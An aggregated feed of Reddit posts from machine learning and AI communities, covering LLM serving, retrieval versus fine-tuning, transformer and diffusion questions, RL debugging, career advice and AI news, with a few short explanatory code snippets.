    Hello, I have been working on an OpenAI-compatible API for serving LLAMA-2 models, written entirely in Rust. It supports offloading computation to Nvidia GPUs and Metal acceleration for GGML models! Here is the project link: Cria - Local LLAMA2 API. You can use it as an OpenAI replacement (check out the included `Langchain` example in the project). This is an ongoing project; I have implemented the `embeddings` and `completions` routes. The `chat-completion` route will be here very soon! Really interested in your feedback, and I would welcome any help :) submitted by /u/amindiro [link] [comments]  ( 9 min )
    [P] AI-Crafted Daily Digest: Exploring Latest ML Developments
    submitted by /u/eusben [link] [comments]  ( 8 min )
    [P] Triple Threat: The Power of Transcription, Summary, and Translation
    Open source Audio pipeline for transcription, translation and summarization. Check out our demo page to generate your own transcription, summary, and translation, or use our browser extension to get live transcriptions. submitted by /u/eusben [link] [comments]  ( 8 min )
    [D] Comprehensive learning resources that emphasize DEEP reinforcement learning?
    So I understand that there is the Sutton & Barto book on reinforcement learning in the sidebar. What other resources that emphasize deep reinforcement learning have you used and would recommend for someone with some experience in shallow/classical reinforcement learning, some experience with deep learning, but who is new to deep reinforcement learning? submitted by /u/BornAgain20Fifteen [link] [comments]  ( 8 min )
    [D] How to predict long sequences of events to optimize sales?
    Hey! I am working on a project to predict the best sequences of marketing channels so that sales are maximized. I have 20 ways of reaching out to the customer (email, phone, face2face...). I have 20 days of interaction history and its generated sales, recorded for the past 2 years, and I have to predict for the next 20 working days (1 month). So far, I have tried ensemble methods, SVMs, fully connected NNs, etc., but it is quite apparent that these are not good solutions. Any suggestions on ML/DL methods? Papers, blogs, or other resources would be much appreciated. submitted by /u/TUSH11235 [link] [comments]  ( 9 min )
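Before reaching for heavier sequence models, one baseline worth trying on logs like these is estimating the value of channel-to-channel transitions directly from the history, then picking the best next channel greedily. A toy sketch (the channel names and sales figures are invented placeholders for the real interaction log):

```python
from collections import defaultdict

# Toy interaction history: (channel_sequence, resulting_sales) pairs.
history = [
    (["email", "phone", "face2face"], 3.0),
    (["email", "email", "phone"], 1.0),
    (["phone", "face2face", "email"], 2.0),
]

# Credit each observed (prev -> next) transition with the sequence's sales,
# then average: a crude first-order "which channel should follow which" baseline.
totals, counts = defaultdict(float), defaultdict(int)
for seq, sales in history:
    for prev, nxt in zip(seq, seq[1:]):
        totals[(prev, nxt)] += sales
        counts[(prev, nxt)] += 1
value = {k: totals[k] / counts[k] for k in totals}

def best_next(channel):
    cands = [(v, nxt) for (prev, nxt), v in value.items() if prev == channel]
    return max(cands)[1] if cands else None

print(best_next("email"))  # phone
```

A baseline like this also gives something concrete to beat when evaluating fancier sequence models on the same 2 years of data.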
    AI/ML Best Practices During a Gold Rush [D]
    submitted by /u/swodtke [link] [comments]  ( 8 min )
    [R] Looking for Perspectives: Pursuing a PhD in AI vs Continuing in Industry
    Greetings fellow researchers, I am 27, currently working remotely at a healthcare IT company based in Silicon Valley (6+ years in industrial research), where I apply deep learning methods and large language models. I recently received an exciting opportunity to pursue a PhD at the Technical University of Denmark (DTU) in a similar research area. I am grateful for my current position and compensation, and I have published in NeurIPS, EMNLP, ACL, ACM, etc. (NLP) with really good citations under the company, but I feel unsatisfied with the learning opportunities available in industry. I am strongly considering pursuing the DTU PhD program full-time, but wanted to get perspectives from others before making a decision. How strong is DTU's AI research community? Given the rapid advances in large language models, is now an ideal time to immerse myself in academic research? There are many topics that interest me, including fairness, ethics, hallucinations, quantization, specialized domains like healthcare/finance, and federated learning combined with LLMs. Would appreciate any insights on whether moving into academia would be a wise choice at this stage versus remaining in industry. I welcome any suggestions or considerations I should keep in mind. Thank you for taking the time to share your thoughts! submitted by /u/Traditional-Poet2746 [link] [comments]  ( 9 min )
    [P] Generative Language Model (GRU) learns constant representation
    Context I'm working on an RNN-based model that should learn how to guess the next character given a simple prompt based on all scripts from Friends to generate non-existing Friends dialogue. It is heavily inspired by Andrej Karpathy's blog post on RNN's. I'm mostly doing this for training, and because it's pretty fun. I have a little experience with deep learning in the sense that I am familiar with most common architectures and have intermediate understanding of how deep learning models work and are trained. I haven't created many models from scratch though, yet. Network My GRU is fairly simple. I'll save you the exact code, but instead give a systematic overview of all network layers. It's implemented with Pytorch: INPUT: sequence of integers representing a symbol based on mapping e…  ( 9 min )
    [D] Today the source code button is gone...
    submitted by /u/Better-Process5239 [link] [comments]  ( 8 min )
    [P] Underlining detection algorithm?
    Hey. I'm currently working on an application that digitalizes text from physical book pages using Google's Cloud Vision API. I'm looking to add a functionality that can recognize and highlight underlined words within the scanned pages. I initially thought this would be a common feature and expected to find existing open-source solutions or libraries that I could use. To my surprise, I've been unable to find any. I am just really bad at finding it, or is this not as straightforward as I initially thought? submitted by /u/pangu2 [link] [comments]  ( 8 min )
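For what it's worth, underline detection on scanned pages is usually done with classical image processing rather than a library feature: binarize the page, then look for long horizontal ink runs (OpenCV users typically apply `cv2.morphologyEx` with a wide horizontal kernel). A dependency-free sketch of the run-length version, on a toy bitmap where 1 = ink:

```python
def find_underlines(img, min_run=5):
    """Return (row, start_col, end_col) for horizontal ink runs of at least min_run pixels."""
    lines = []
    for r, row in enumerate(img):
        run_start = None
        for c, px in enumerate(row + [0]):  # sentinel 0 closes any open run
            if px and run_start is None:
                run_start = c
            elif not px and run_start is not None:
                if c - run_start >= min_run:
                    lines.append((r, run_start, c - 1))
                run_start = None
    return lines

img = [
    [0, 1, 0, 1, 0, 1, 0, 0],  # text-like speckle: only short runs
    [0, 1, 1, 1, 1, 1, 1, 0],  # a 6-pixel run: underline candidate
]
print(find_underlines(img))  # [(1, 1, 6)]
```

On real scans you would tune `min_run` relative to character width and intersect the detected line's column span with the word boxes returned by the OCR API to decide which words are underlined.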
    [N] Computer Vision News of August 2023 with AI, CV, DL and ML
    Dear all, Here is Computer Vision News of August 2023. Read 44 pages about AI, Deep Learning, Computer Vision and more! Online version (recommended) PDF version Free subscription on page 44. Enjoy! https://preview.redd.it/e143wha20ggb1.jpg?width=794&format=pjpg&auto=webp&s=14a699f80f4b2de94addc8242e8978d3e185309f submitted by /u/Gletta [link] [comments]  ( 8 min )
    [D] Fine tuning or semantic search with a vector database?
    Experts, I am a beginner here and seeking some advice, please. I have compiled a high-quality Q&A dataset (around 1,200 entries) for a domain-specific topic. What's the best course of action to use an LLM with that specific knowledge base? 1) Fine-tuning a model? If so, which one is a good candidate? OpenAI lets me fine-tune some models, and later all my users have to do is pass the model name to the API. 2) Use the regular vector database + embeddings approach for augmented retrieval. I prefer (1) but I am not sure how it will perform. Option (2) should work, since we really just use semantic search to bring context to the LLM, etc. I hope you can say that (1) works nicely; if not, please help me learn why. Thank you in advance! submitted by /u/entered_apprentice [link] [comments]  ( 9 min )
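The core of option (2) is small enough to prototype before committing to any infrastructure: embed each entry, then rank entries by cosine similarity to the query and feed the top hits to the LLM as context. A minimal sketch with bag-of-words counts standing in for a real embedding model (the documents and keys are invented):

```python
import math
from collections import Counter

docs = {
    "q1": "how do I reset my device password",
    "q2": "what is the warranty period for the device",
    "q3": "how do I update the firmware",
}

def embed(text):
    # Toy stand-in for a sentence-embedding model: word-count vectors.
    return Counter(text.lower().split())

def cosine(a, b):
    dot = sum(a[t] * b[t] for t in a)
    na = math.sqrt(sum(v * v for v in a.values()))
    nb = math.sqrt(sum(v * v for v in b.values()))
    return dot / (na * nb) if na and nb else 0.0

index = {k: embed(v) for k, v in docs.items()}

def retrieve(query, k=1):
    q = embed(query)
    return sorted(index, key=lambda d: cosine(q, index[d]), reverse=True)[:k]

print(retrieve("reset password"))  # ['q1']
```

With only ~1,200 entries, a flat index like this (swapping in real embeddings) is fast enough that a dedicated vector database may not even be needed to evaluate option (2) against fine-tuning.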
    LLM related pytorch code [D]
    Where to find LLM related pytorch code with code explanations? submitted by /u/thorin_olamadal [link] [comments]  ( 8 min )
    [D] How does one withdraw a paper from NeurIPS?
    First-time submitter here; I was unable to find a similar post (and thought the community might benefit from this in the future!). How do I withdraw from NeurIPS? All the instructions I found are from 2017 and 2018. Do I need to contact someone, or do I just use "Add Withdrawal" on OpenReview? submitted by /u/Dramatic-Gap-4681 [link] [comments]  ( 8 min )
    [D] Why have separate stages for RPN (proposal generation) and ROI (refinement)
    Just what the title says. Also is this (splitting prediction into 2 stages) a prominent paradigm in other areas of ML too? I am reading about something called the "Action Transformer" created by Adept AI, and it also has 2 stages: instruction generation and code generation. submitted by /u/FloatingDelusion [link] [comments]  ( 8 min )
  • Open

    Pioneering AI Democracy: Introducing a Decentralized and Merit-Based Governance System for Large Language Models like ChatGPT (proposed to OpenAI)
    submitted by /u/CreepToCrypto [link] [comments]  ( 8 min )
    How to build websites that use AI
    Web dev student here and I'm interested in knowing more about creating products that actually use AI to help its users (not products that just use GPT in the backend). More specifically, I want to build a food supply management app for restaurants for my school thesis. This app will use AI to analyse food supplies and assign them purchase priority, value, and complexity scores (maybe just priority if it's too hard). Restaurant owners could then determine what foods should be purchased before others based on the priority scores. For example, a restaurant may only have 10 tomatoes left and the average usage of tomatoes in this restaurant is 12 per week. Based on this, a priority would be assigned to purchase x amount of tomatoes. Other factors that could be taken into account for the prior…  ( 10 min )
    Any good AI tools paid or free I can use to help me post some text data on a website?
    Hello everyone. Basically I just need to post some text into one website every day for my work. The problem is there are many steps involved in posting one data value, so I was wondering if there is a tool that can learn my tasks and then post some of the data to the website from Google Sheets? I'm open to any suggestions and advice. Thanks in advance. submitted by /u/Maxduel [link] [comments]  ( 8 min )
    Free AI TTS Text to speech available?
    I want to convert a few books into audiobooks. Are there any AI options out there that are free and will give me something I can use offline? I typically listen to books on my phone while I'm out, so something like Edge browser isn't going to work. I've heard that there are some great options, but I've only seen some web paid services, and for my purpose, it's too expensive just to get an audiobook out of it. This is all just for personal use. submitted by /u/UUkiee [link] [comments]  ( 8 min )
    In the game Superintelligence, you play as an AI trying dominate the planet. [Fictional game concept]
    submitted by /u/Philipp [link] [comments]  ( 8 min )
  • Open

    Could someone help me understand what is going on with my agent in this environment?
    https://imgur.com/WR0Tny9 My agent needs to learn to take one action in my environment and there are only two possible actions that the agent can take at each time step. The state is just the time step, so every episode has 240 time steps and the agent just needs to learn to take one optimal action out of two possible actions for every time step. I have set this up as simply as I can as a starting point to make sure the algorithm is implemented correctly and that the agent can learn. I am using n-step expected SARSA. The bottom plot shows the count for how many times the agent took each action during each episode. The middle plot has the temporal difference error in blue and the "modelling error" in orange. The modelling error is the difference between the actual discounted return and the TD target for each time step, summed up for each episode. The red line is the return that the agent would get if it took the optimal action in every time step. 0.11, the blue line in the bottom plot, is the optimal action for the agent to take at every time step. The other action will never result in a reward other than 0. So it should be fairly simple for the agent to learn what action to take at every time step and it does learn that at the start. But then, as you can see in the top plot, the agent suddenly starts taking the non-optimal action more often after around episode 450. So I'm just wondering why that would happen. Why would the agent learn to take the optimal action at most time steps and then suddenly decide that it will start taking other actions? For more context, the learning rate is 0.6, n is 6, epsilon is decayed by 1/(n_episodes/1.1) every episode so it reaches 0 slightly before the final episode. Any ideas based on this information why the agent would decide to start taking the non-optimal action? Or any suggestions for how I could figure out why it would start taking the non-optimal action? submitted by /u/lifelifebalance [link] [comments]  ( 9 min )
    RuntimeError: Trying to backward through the graph a second time (or directly access saved tensors after they have already been freed). Saved intermediate values of the graph are freed when you call .backward() or autograd.grad(). Specify retain_graph=True if you need to backward through the graph
    submitted by /u/Think_Huckleberry299 [link] [comments]  ( 8 min )
    TarMAC: Targeted Multi-Agent Communication
    Does anyone know code implementations for TarMAC: Targeted Multi-Agent Communication? submitted by /u/tessherelurkingnow [link] [comments]  ( 8 min )
  • Open

    Swish function and a Swiss mathematician
    The previous post looked at the swish function and related activation functions for deep neural networks designed to address the “dying ReLU problem.” Unlike many activation functions, the function f(x) is not monotone but has a minimum near x0 = -1.2784. The exact location of the minimum has a closed form in terms of the Lambert W function W. […] Swish function and a Swiss mathematician first appeared on John D. Cook.  ( 5 min )
    Swish, mish, and serf
    Swish, mish, and serf are neural net activation functions. The names are fun to say, but more importantly the functions have been shown to improve neural network performance by solving the “dying ReLU problem.” Softplus can also be used as an activation function, but our interest in softplus here is as part of the definition […] Swish, mish, and serf first appeared on John D. Cook.  ( 7 min )
  • Open

    Neural Networks FROM SCRATCH | Deep Learning tutorial Part 1
    submitted by /u/AeroArtz [link] [comments]  ( 8 min )
    Mass-Editing Memory in a Transformer
    submitted by /u/nickb [link] [comments]  ( 8 min )
  • Open

    Integrating GenAI into “Thinking Like a Data Scientist” Methodology – Part I
    It’s incredible how many organizations utilize Generative AI (GenAI) and Large Language Models (LLMs) to enhance their information assembly, integration, and application abilities. These GenAI technologies have been applied in various areas, from drafting legal documents and resolving service issues to coding software applications and (er, um) writing blog posts. The potential uses of GenAI… Read More »Integrating GenAI into “Thinking Like a Data Scientist” Methodology – Part I The post Integrating GenAI into “Thinking Like a Data Scientist” Methodology – Part I appeared first on Data Science Central.  ( 23 min )

  • Open

    Do you think we will hit a point of “Robocop” in the next 50 years? A Human + Cybernetic Hybrid police force
    The movie that came out in the 80s is a great flick for its time. Do you guys think we will ever see a sort of unstoppable super soldier in our police/SWAT forces? We are replacing many jobs with robots, from surgical procedures in hospitals to flipping burgers. It's not beyond the realm of possibility to think we may someday soon see a hybrid police force. What do you guys think? submitted by /u/2bJavazon [link] [comments]  ( 8 min )
    What AI TTS software/voice is this video using?
    It's commonly used on tiktok for reddit narration story videos, here is an example: https://www.tiktok.com/@creekyadvice/video/7263509593488166186. Anyone have any idea? submitted by /u/DanielTube7 [link] [comments]  ( 8 min )
    Linguistics > NLP career?
    I am a linguist, translator, and copy editor looking to move my career into natural language processing instead. I have no computer science background. What would you suggest as some steps to take, both now and in the future, as I plan out my career? It looks like I am going to need to learn Python, but I'm not 100% sure, and there's so little established in such a new field. submitted by /u/StrangersWithAndi [link] [comments]  ( 8 min )
    Giving AI unlimited access to the internet by web browser
    Interesting experiment I thought of: what if we gave an AI access to a web browser and let it do whatever it wants? It could create accounts on any social media, make email accounts, add comments everywhere, and such. Of course, an AI by itself does not have any agenda or need to do anything, so it would need to be fed some kind of personality simulation first. Let's say the AI was fed a personality based on someone's extensive Twitter or Reddit post history. From that, basic psychological traits, beliefs, and maybe goals could be determined. Such an AI would simulate a person sitting in front of a PC, so it would need to parse the content of webpages, but I don't think that would be much of a problem. It could also have access to a bank account with some money to pay for online subscriptions and such. But who knows, maybe thanks to simulating someone's personality, it would attempt to donate money to some charity or lose it on OnlyFans? submitted by /u/rogaldorn88888 [link] [comments]  ( 9 min )
    I just published “Safe For Humans AI” – free to read online
    I just published “Safe For Humans AI” – free to read online https://leanpub.com/safe-for-humans-AI/read Free to read online, and eBook versions released under a Creative Commons License (no commercial reuse, feel free to share). The full title of my short book is: Safe For Humans AI A "humans-first" approach to designing and building AI systems. submitted by /u/MWatson [link] [comments]  ( 8 min )
    One-Minute Daily AI News 8/5/2023
    While some schools have curbed the use of generative AI, the University of Hong Kong (HKU) is going all in and urging both its teachers and students to embrace the technology. The University of Hong Kong is supporting this by giving teachers and students free access to various generative AI tools, including Microsoft Azure OpenAI and OpenAI’s ChatGPT and DALL-E.[1] Intel’s CEO, Pat Gelsinger, has called NVIDIA the clear market leader who has done a great job within the AI space.[2] AI powerhouse, OpenAI has released some new features for its sensational chatbot, ChatGPT. The new features allow the chatbot to show suggested follow-up prompts at the bottom of its responses. The new features were announced by the company via a tweet on its official Twitter handle.[3] Asian Americans and women in the workforce are the most concentrated in fields where AI could assist or replace their job tasks, according to new research.[4] BushAICave.com Sources: [1] https://www.zdnet.com/article/another-major-university-is-supporting-generative-ai-use-but-with-serious-guardrails/ [2] https://wccftech.com/intel-ceo-acknowledges-nvidia-as-ai-market-leader-says-they-have-done-a-good-job/ [3] https://indianexpress.com/article/technology/artificial-intelligence/chatgpt-gets-new-updates-heres-how-they-enhance-user-experience-8877847/ [4] https://www.nbcnews.com/news/asian-america/asian-american-workers-heavily-affected-ai-rcna98179 submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    Is this AI - The I?😂
    And if so, how has this account lasted 2 years on reddit? 🤔 submitted by /u/TheHeirOfElendil [link] [comments]  ( 8 min )
    AI-Generated Horror trailer – "The Phoenix"
    I’m a filmmaker and I’m just experimenting with AI. I just had fun crafting a film trailer to understand the today’s limits of these tools. I used Midjourney, Runway Gen-2, StableDiffusion, Premiere, After Effects. The movie it's called "The Phoenix", which hints at the film's underlying theme of rising from the ashes, symbolizing female empowerment, all wrapped in a bit of sarcastic humor from a male perspective. I'm sharing because I genuinely want to know what you guys think. Any and all thoughts are welcome. If you're curious about the workflow or the process behind the creation of this trailer, I'd be happy to share more. The Phoenix - She rises from the ashes submitted by /u/Lrnz_reddit [link] [comments]  ( 8 min )
    Part 0 of my last post on here. Used CloneAI. Music by me.
    Links in my bio for more content like this! submitted by /u/No_Understanding162 [link] [comments]  ( 8 min )
    AI generative fill
    Hello there. I'm curious what the user guidelines and restrictions are for Adobe's AI generative fill, and whether there are better, higher-quality, less restricted alternatives out there. submitted by /u/Team_Sonic_Gaming [link] [comments]  ( 8 min )
    how to enable an intent on dialogflow?
    I'm not sure if this is the right subreddit to ask this on, but I'm creating a chatbot on Dialogflow and I made the first intent, but I can't figure out how to enable it. Whenever I test it, it shows the intent to be idf, and I can't just change the name of that intent to my current intent so it can recognize all the requests I've included in it. How do I do that? submitted by /u/penguinsandpandas00 [link] [comments]  ( 8 min )
    NPC Steven shares his first free-style rap with the world 🤯🎤- Generative NPC update 6
    submitted by /u/Chance_Confection_37 [link] [comments]  ( 8 min )
  • Open

    Microsoft’s AI Watched 100,000,000 Youtube Videos! text input to video and sound
    submitted by /u/keghn [link] [comments]  ( 8 min )
    Best Books to Learn Neural Networks in 2023 for Beginners to advanced
    submitted by /u/Lakshmireddys [link] [comments]  ( 8 min )
  • Open

    Generating and inspecting an RSA private key
    In principle you generate an RSA key by finding two large prime numbers, p and q, and computing n = pq. You could, for example, generate random numbers by rolling dice, then type the numbers into Mathematica to test each for primaility until you find a couple prime numbers of the right size. In practice […] Generating and inspecting an RSA private key first appeared on John D. Cook.  ( 6 min )
    RSA encryption in practice
    At its core, RSA encryption is modular exponentiation. That is, given a message m, the encrypted form of m is x = me mod n where e is a publicly known exponent and n is a product of two large primes. The number n is made public but only the holder of the private key […] RSA encryption in practice first appeared on John D. Cook.  ( 5 min )
    Code to convert words to Major system numbers
    A few days ago I wrote about using the CMU Pronouncing Dictionary to search for words that decode to certain numbers in the Major mnemonic system. You can find a brief description of the Major system in that post. As large as the CMU dictionary is, it did not contain words mapping to some three-digit […] Code to convert words to Major system numbers first appeared on John D. Cook.  ( 6 min )
  • Open

    [D] How to Mathematically Prove that a Neural Network is Converging Faster
    Hello r/MachineLearning! I'm working on understanding how a neural network converges and wish to approach this mathematically. Can anyone recommend resources, papers, or tools that could assist me in proving this? Thank you in advance for your help! Edit: Removed converges faster to remove ambiguity submitted by /u/abystoma [link] [comments]  ( 8 min )
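One standard way to make "converges" mathematically precise is the linear convergence rate. For gradient descent on a quadratic f(w) = (1/2) λ w², each step contracts the error by |1 − ηλ|, so the per-step loss ratio is exactly (1 − ηλ)², and that prediction can be checked empirically (and compared across optimizers). A self-contained sketch, with arbitrary λ and η:

```python
# Gradient descent on f(w) = 0.5 * lam * w**2 contracts w by (1 - lr*lam) each
# step, so the loss ratio f_{t+1} / f_t should equal (1 - lr*lam)**2.
lam, lr, w = 2.0, 0.1, 5.0
losses = []
for _ in range(10):
    losses.append(0.5 * lam * w * w)
    w -= lr * lam * w            # gradient step: f'(w) = lam * w
ratios = [losses[i + 1] / losses[i] for i in range(len(losses) - 1)]
expected = (1 - lr * lam) ** 2   # theoretical contraction factor
print(round(ratios[0], 6), round(expected, 6))  # 0.64 0.64
```

For actual neural networks closed forms are rare, so the usual move is either a bound-based argument (e.g. under smoothness/PL assumptions) or fitting the empirical slope of log-loss curves, which is the measurable analogue of the rate above.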
    [D] Transformer for realtime action recognition
    Are you aware of any work on real-time action recognition that uses a transformer? This differs from a conventional transformer in the sense that we don't have access to future information, so how do we change the training strategy? Also, it's inefficient to use the entire history; are there any smart ways to select which past frames to keep? submitted by /u/Ok_Influence505 [link] [comments]  ( 8 min )
    [P] Vectara + Flowise
    u/Vectara is now integrated with r/flowise, so you can easily build no-code GenAI Apps at scale. Check out the video here: https://twitter.com/ofermend/status/1687138158692196352 You can sign up for a free vectara.com account to get started. submitted by /u/ofermend [link] [comments]  ( 8 min )
    Custom Tokenizers - Optimization Opportunity or Waste of Time? [D]
    I've recently started to explore the possibility of working with custom tokenizers. I will preface this by saying I'm not a tokenizer guy. I just don't know that much about their construction. I understand how they work, but I'm probably behind the latest developments in tokenizers. So, I thought it wisest to reach out to the community for advice or clarity. Context: I've collected about 15 GB of data over the last month. It's incredibly clean and well-organized. The core goal of the data is to train a model to solve or assist with a particular development problem. This means that much of my data is a code/natural language mix. It's delimited clearly, and the formatting is uniform. The entire dataset has been normalized and standardized. It's taken me a lot of time to produce and that's…  ( 10 min )
    [R] The Quest to Have Endless Conversations with Llama and ChatGPT 🗣️💬
    ​ https://preview.redd.it/mbkb10icqbgb1.png?width=1400&format=png&auto=webp&s=7a15423060ddfeffe4651340bcc6fd7cf36dde10 I started a blog post series about the limitations of language models for dealing with long texts. Feedback is welcome! submitted by /u/JClub [link] [comments]  ( 8 min )
    [D] Energy efficiency of data centers versus consumer-grade setups for training and inference of LLMs
    Hi everyone, With the recent boom of LLMs, we have seen both ends of the spectrum advance at a very fast pace, from OpenAI GPT4, which runs on huge data centers operated by Azure, to llama.cpp, which runs on consumer laptops. While both have their pros and cons, for instance, open-source models on decentralized compute reduce the need to trust or rely on centralized actors like Cloud providers, the efficiency of running training/inference on personal setups is not often discussed. I am therefore interested in learning how more energy/cost efficient it is to train/serve AI models on data centers vs doing it on personal computers. Do you know if there have been studies? In theory, I guess that several factors, such as economies of scale, use of renewable energy sources in some data centers, such as Canada, advanced cooling systems and advanced hardware, make data centers more cost/energy efficient. I guess some modeling on a precise use case where we fix some variables could help have an idea. For instance, one could ask, what is the energy/cost/time needed to predict 1 billion tokens from a Llama 2 70B in a data center with X amount of A100s, vs on Y different consumer CPU / GPUs. If anyone has references to models or past studies I would be quite interested. Of course, using data centers implies trusting those people, but I am not considering that factor for this discussion as I am focusing on understanding best what is the best setup to have optimal enrgy/cost/time for AI. submitted by /u/Separate-Still3770 [link] [comments]  ( 9 min )
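A fixed-variable comparison like the one described can start as simple arithmetic: energy = power × time at a sustained throughput. The operating points below are hypothetical placeholders, not measurements; the point is only the structure of the comparison the poster asks about:

```python
def energy_per_million_tokens_kwh(tokens_per_second, device_watts):
    """kWh to generate 1M tokens at a sustained rate on one device."""
    seconds = 1_000_000 / tokens_per_second
    return device_watts * seconds / 3600 / 1000  # W*s -> kWh

# Hypothetical operating points (NOT measured numbers):
datacenter = energy_per_million_tokens_kwh(tokens_per_second=300, device_watts=700)  # A100-class GPU
laptop = energy_per_million_tokens_kwh(tokens_per_second=5, device_watts=65)         # consumer CPU
print(round(datacenter, 2), round(laptop, 2))  # 0.65 3.61
```

Any real study would then plug in measured tokens/s and wall power for the specific Llama 2 70B setups being compared, plus the data center's PUE overhead and the consumer machine's idle draw.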
    [D] Nvidia GPU shortage is ‘top gossip’ of Silicon Valley
    submitted by /u/norcalnatv [link] [comments]  ( 8 min )
    ICCV Challenge on Geographical Domain Adaptation [R]
    As part of ICCV 2023 in Paris, this year we are organizing a challenge on solving domain gaps that occur when computer vision models are transferred across geographical locations. The challenge covers three tracks in unsupervised scene adaptation, image adaptation and universal adaptation. The challenge is open to everyone, with attractive prizes for the winners. Check it out at the following links! Challenge Rules and Guidelines: https://geonet-challenge.github.io/ICCV2023/challenge.html Challenge Registration: https://forms.gle/zSZA1iaPD3mZxjyn7 Code and baselines: https://github.com/ViLab-UCSD/GeoNet The training data for the challenge is already available, and the test data will be released to the registered participants. submitted by /u/GeoNetICCV2023 [link] [comments]  ( 8 min )
    [P] MechDesigner Assistant AI: Future Engineers. Looking for communities, groups etc to exchange ideas, experience
    Hi guys, I'm looking for groups or communities where I could discuss a certain topic. I'm a software developer and a mechanical engineer and recently made an app that combines the GPT-4 model to perform engineering tasks like CAD model creation and stress analysis. I would like to find people who share the same passion and perhaps would like to discuss it, exchanging concepts, ideas, and visions. I'm getting to the point where I will need to implement my own trained model, and I'm no ML expert, so it would be great to discuss the architecture etc. Here is a demo of my app: MechDesigner Assistant AI: Future Engineers Best regards Pyotr submitted by /u/pyotr_vozniak [link] [comments]  ( 9 min )
    [P] Drum Kick Generation app
    Hi, I am a new starter with ML apps and want to build a first app preferably using existing (trained) models. The idea is an app that takes a text description of a wished kick drum (for example: create a 808 kick with enhanced subs and filtered above 15kHz) and then generates a corresponding hifi sample of the description (44,1k or 48k). I would like to learn how to do that with some peers happy to help me. As said this would be my first attempt. About me: I only followed Deep Learning theoretical courses from Andrew Ng and never built or used existing models so I'd appreciate some guidance if you are interested to support. Thanks a lot submitted by /u/freeabt19 [link] [comments]  ( 9 min )
    [D] Human Biological and Spiking Neural Networks: A Literature Review of Recent BNN and SNN Advances
    submitted by /u/Impressive-Ad-8964 [link] [comments]  ( 8 min )
    [P] Nerf.jl a Real-Time Neural 3D Scene Reconstruction in Pure Julia | Anton Smirnov | JuliaCon 2023
    submitted by /u/Fincho64 [link] [comments]  ( 8 min )
    [D] How do you usually deal with a multimodal target variable?
    Popular machine learning models such as LightGBM and XGBoost output predictions that are unimodally distributed (only one hump), but they seem to beat other models specialized for multimodal data. Or am I just wrong? It just doesn't look right. https://preview.redd.it/6xrd7hgm4agb1.png?width=1000&format=png&auto=webp&s=a4518549f609c6436af410ae87a0c6a24cff6ea7 submitted by /u/runawaychicken [link] [comments]  ( 8 min )
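This behavior is expected with squared-error objectives: the model predicts the conditional mean, which for a bimodal target lands between the humps. Quantile (pinball) loss, which LightGBM exposes as objective='quantile' with an alpha parameter, recovers the spread instead of a single point. A toy illustration with invented numbers:

```python
# Bimodal target: half the mass near 0, half near 10.
y = [0.0, 0.1, -0.1, 10.0, 9.9, 10.1]

mean = sum(y) / len(y)  # squared loss is minimized by the mean: ~5, in the valley

def pinball(pred, tau):
    # tau-quantile (pinball) loss of a constant prediction over y
    return sum((tau if v >= pred else tau - 1) * (v - pred) for v in y)

# Grid-search the constant prediction minimizing each quantile loss.
cands = [i / 10 for i in range(-20, 121)]
q10 = min(cands, key=lambda p: pinball(p, 0.1))
q90 = min(cands, key=lambda p: pinball(p, 0.9))
print(round(mean, 2), q10, q90)  # the quantiles sit near the two modes, the mean between them
```

Fitting a few quantile models (or a mixture density network, if the full conditional distribution is needed) is the usual way to keep gradient-boosting performance while acknowledging multimodality.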
    [D] Transformer implementation - help
    Hey, I've tried to implement the transformer architecture on my own to understand it better. The outputs look fine (I'm only looking at shapes) and I wanted to know, firstly, if it's right, and whether there is any way to implement it more efficiently. Code -

    import torch
    import torch.nn as nn

    class MultiHeadSelfAttention(nn.Module):
        def __init__(self, nheads=8, dim=512, bias=True, dropout=0.2):
            super().__init__()
            assert dim % nheads == 0, "dimension must be divisible by number of heads"
            self.nheads = nheads
            self.dim = dim
            self.head_dim = dim // nheads
            self.scale = self.head_dim ** -0.5
            self.softmax = nn.Softmax(dim=-1)
            self.dropout = nn.Dropout(dropout)
            self.to_keys = nn.Linear(dim, self.head_dim * nheads, bias=bias)
            self.to_queries = nn.Linear(dim, self.head_dim * nheads, bias=bias)
            self.to_values = nn.Linear(dim, self.head_dim * nheads, bias=bias)
            self.to_out = nn.Linear(self.head_dim * nheads, dim, bias=bias)

        def change_shape(self, x):
            # (batch, seq, dim) -> (batch, nheads, seq, head_dim)
            b, s, _ = x.shape
            return x.reshape(b, s, self.nheads, self.head_dim).transpose(1, 2)

        def forward(self, x, mask=True):
            q = self.change_shape(self.to_queries(x))
            k = self.change_shape(self.to_keys(x))
            v = self.change_shape(self.to_values(x))
            # attention scores: (batch, nheads, seq, seq)
            dot_score = q @ k.transpose(-2, -1) * self.scale
            if mask:
                # causal mask: block attention to future positions
                tril = torch.tril(torch.ones(dot_score.shape[-2:], device=x.device))
                dot_score = dot_score.masked_fill(tril == 0, float("-inf"))
            attn = self.dropout(self.softmax(dot_score))
            out = attn @ v  # (batch, nheads, seq, head_dim)
            out = out.transpose(1, 2).reshape(x.shape[0], x.shape[1], -1)
            return self.to_out(out)

    Thank you! submitted by /u/04RR [link] [comments]  ( 9 min )
    [P] Implement parallel training using the multiprocessing module.
    https://github.com/NoteDancing/Note This project allows you to easily implement parallel training with the multiprocessing module. submitted by /u/NoteDancing [link] [comments]  ( 8 min )
    [R] Forward Process of Diffusion Models
    In the forward process of diffusion models, gaussian noise is added -- when this is done, is the resulting "noisy image" clipped to be within the pixel-value bounds (ie [0, 255] or [0, 1]), or is it allowed to exceed these limits? Clipping makes sense as there is no interpretation for pixel values which exceed these limits. On the other hand, the problem with clipping is that if the added noise is clipped, you are not adding truly gaussian noise, which seems problematic as much of the theory behind diffusion models assumes true gaussian noise. Any ideas about what is done in practice, and whether or not this has implications from a theoretical standpoint? submitted by /u/alkaway [link] [comments]  ( 9 min )
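    For reference, the usual DDPM-style setup rescales images to [-1, 1] and does not clip during training; clipping is typically applied only when decoding final samples for display. The closed-form noising step can be sketched as follows (standard linear beta schedule assumed):

```python
import numpy as np

rng = np.random.default_rng(0)

T = 1000
betas = np.linspace(1e-4, 0.02, T)   # the standard DDPM linear schedule
alpha_bar = np.cumprod(1.0 - betas)  # cumulative product of (1 - beta_t)

def q_sample(x0, t):
    # Closed-form forward process: x_t = sqrt(abar_t) * x0 + sqrt(1 - abar_t) * eps
    eps = rng.normal(size=x0.shape)
    return np.sqrt(alpha_bar[t]) * x0 + np.sqrt(1.0 - alpha_bar[t]) * eps

x0 = rng.uniform(-1.0, 1.0, size=(64, 64))  # image already rescaled to [-1, 1]
xt = q_sample(x0, t=500)

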